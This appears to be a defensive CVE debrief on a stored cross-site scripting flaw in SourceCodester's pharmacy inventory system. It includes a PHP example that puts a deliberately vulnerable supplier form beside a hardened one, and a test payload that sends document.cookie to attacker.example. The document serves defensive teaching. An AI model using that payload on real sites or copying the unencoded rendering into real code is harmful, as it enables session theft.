PatchSiren cyber security CVE debrief
CVE-2026-10245 SourceCodester CVE debrief
A stored cross-site scripting (XSS) vulnerability exists in SourceCodester Pharmacy Sales and Inventory System 1.0, specifically within the create_supplier function reachable via the /ShowForm/create_supplier/main endpoint. The company_name parameter is not sufficiently sanitized, so a remote attacker holding a low-privileged account (PR:L in the CVSS vector) can store script in the supplier record; it executes in the browser of any user who later views that record. The vulnerability carries a LOW severity CVSS score of 2.0, reflecting the privilege requirement, the need for victim interaction and the limited (integrity-only) impact. The issue was published on June 1, 2026, and proof-of-concept exploit details are publicly available. Vendor attribution is low-confidence: it was derived from reference-domain analysis pointing to Vuldb as the primary reporting source rather than confirmed by the vendor.
- Vendor
- SourceCodester
- Product
- Pharmacy Sales and Inventory System
- CVSS
- LOW 2.0
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-01
- Original CVE updated
- 2026-06-01
- Advisory published
- 2026-06-01
- Advisory updated
- 2026-06-01
Who should care
Organizations running SourceCodester Pharmacy Sales and Inventory System 1.0, particularly healthcare and pharmacy management environments. Security teams responsible for web application protection and input validation controls. Developers maintaining PHP-based inventory management systems.
Technical summary
The create_supplier function in SourceCodester Pharmacy Sales and Inventory System 1.0 fails to validate or sanitize the company_name parameter before storing it, and the stored value is later rendered to other users, enabling stored cross-site scripting. An authenticated attacker with low privileges can submit the payload remotely; it executes in the browsers of users who subsequently view the supplier data. Exploitation requires user interaction (UI:P), and the recorded impact is limited loss of integrity (VI:L) with no confidentiality or availability impact. The CVSS 4.0 score of 2.0 reflects these constraints. A proof-of-concept exploit has been published (E:P), which lowers the effort needed for an attempt even though the severity remains low.
Defensive priority
low
Recommended defensive actions
- Apply input validation on the company_name parameter in the create_supplier function and HTML entity encoding wherever the stored value is rendered (validation alone is not sufficient; encode at output)
- Implement a Content Security Policy (CSP) header without 'unsafe-inline' in script-src to limit the impact of any XSS that slips through
- Review and sanitize all user-supplied input in the /ShowForm/create_supplier/main endpoint
- Consider removing or restricting access to the application until patches are available
- Monitor for unauthorized access attempts to the create_supplier endpoint
- Validate that vendor attribution is confirmed before distributing internal advisories
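The vulnerable pattern beside its hardened counterpart, as an added PatchSiren illustration rather than code taken from SourceCodester's application (the real create_supplier handler and its templates are not reproduced here). It demonstrates the three controls from the technical summary and the recommended actions above: validation at the create_supplier input boundary, HTML entity encoding at the point of rendering, and a CSP header as a backstop. It assumes PHP 8 with the mbstring extension, an in-memory array standing in for the database, a constructed payload, and an allow-list regex chosen for the example; all function names are hypothetical.

```php
<?php
// Added illustration (PatchSiren example, not code from SourceCodester's
// Pharmacy Sales and Inventory System). Function names, the in-memory store
// and the payload are constructed for the example. Requires PHP 8 + mbstring.
declare(strict_types=1);

// ---- Vulnerable pattern (CWE-79): stored as received, rendered as received ----
function create_supplier_vulnerable(array &$suppliers, array $post): void
{
    // No validation: the raw company_name goes straight into storage.
    $suppliers[] = ['company_name' => (string) ($post['company_name'] ?? '')];
}

function render_suppliers_vulnerable(array $suppliers): string
{
    $html = "<table>\n";
    foreach ($suppliers as $s) {
        // No output encoding: a stored payload becomes live markup for every viewer.
        $html .= "<tr><td>{$s['company_name']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// ---- Hardened pattern: validate on input, encode on output, CSP as a backstop ----
function validate_company_name(string $name): string
{
    $name = trim($name);
    if ($name === '' || mb_strlen($name, 'UTF-8') > 120) {
        throw new InvalidArgumentException('company_name must be 1-120 characters');
    }
    // Allow-list (an assumption for this example): letters, digits, spaces and the
    // punctuation seen in company names. Angle brackets, double quotes, '=' and
    // control characters are not business data here, so they are rejected.
    if (!preg_match('/^[\p{L}\p{N} .,&\'\-()\/]+$/u', $name)) {
        throw new InvalidArgumentException('company_name contains disallowed characters');
    }
    return $name;
}

function create_supplier_hardened(array &$suppliers, array $post): void
{
    $suppliers[] = ['company_name' => validate_company_name((string) ($post['company_name'] ?? ''))];
}

// Encoder for HTML element content and quoted attribute values (ENT_QUOTES covers ' as well).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_suppliers_hardened(array $suppliers): string
{
    $html = "<table>\n";
    foreach ($suppliers as $s) {
        $html .= '<tr><td>' . h($s['company_name']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// CSP to send with every HTML response: no inline script and no foreign script origins,
// so an encoding slip elsewhere in the app still cannot execute an injected <script>.
function csp_header(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "object-src 'none'; base-uri 'none'; frame-ancestors 'none'";
}

// ---- Self-check with a constructed payload ----
function self_check(): array
{
    $payload = ['company_name' => '<script>fetch("//attacker.example/?c=" + document.cookie)</script>'];
    $results = [];
    $vuln = [];
    create_supplier_vulnerable($vuln, $payload);
    $results['vulnerable_renders_script'] = str_contains(render_suppliers_vulnerable($vuln), '<script>');
    $hard = [];
    try {
        create_supplier_hardened($hard, $payload);
        $results['hardened_rejects_input'] = false;
    } catch (InvalidArgumentException $e) {
        $results['hardened_rejects_input'] = true;
    }
    // Even if validation were relaxed, output encoding alone neutralises the payload.
    $encoded = render_suppliers_hardened([['company_name' => $payload['company_name']]]);
    $results['hardened_encodes_output'] = !str_contains($encoded, '<script>')
        && str_contains($encoded, '&lt;script&gt;');
    return $results;
}

if (PHP_SAPI !== 'cli') {
    header(csp_header());
}
foreach (self_check() as $check => $ok) {
    printf("%-28s %s\n", $check, $ok ? 'PASS' : 'FAIL');
}
```

Run from the command line with `php example.php`; all three checks should print PASS. The allow-list is deliberately narrow for a company-name field; if a deployment needs characters outside it, widen the regex rather than dropping validation, and keep the output encoding in place regardless, since the encoder is what protects every other field that renders the same way.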
Evidence notes
The vulnerability description is sourced from official CVE metadata and Vuldb records. The affected product is identified as SourceCodester Pharmacy Sales and Inventory System 1.0. The vulnerable function is create_supplier in /ShowForm/create_supplier/main. The attack vector is remote via manipulation of the company_name argument. CVSS 4.0 vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. Weaknesses identified as CWE-79 (Cross-site Scripting) and CWE-94 (Code Injection). Vendor confidence is low with needsReview flag set; canonical source is reference_domain_weak.
Official resources
Public disclosure occurred on 2026-06-01. Exploit details have been published and are available in public sources. No known active exploitation or ransomware campaign association has been identified.